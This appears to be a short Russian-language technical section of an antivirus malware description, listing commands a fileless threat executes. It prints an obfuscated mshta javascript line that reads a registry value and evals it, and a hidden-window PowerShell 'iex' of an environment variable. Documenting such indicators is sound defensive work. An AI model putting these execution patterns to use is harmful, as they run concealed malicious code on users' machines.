Техническая информация
- '<SYSTEM32>\mshta.exe' javascript:R2zuED="g9";QF6=new%20ActiveXObject("WScript.Shell");JUKU2sjM="hwGq";uYtD9=QF6.RegRead("HKLM\\software\\Wow6432Node\\2Nj3ewE\\Yudy8GvkbU");oA20Ih="wslwpTB";eval(uYtD9);cF4Zdxw2u="xpm...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' iex $env:qlba (со скрытым окном)
- '%WINDIR%\microsoft.net\framework\v2.0.50727\dw20.exe' -x -s 820
- '%WINDIR%\syswow64\regsvr32.exe'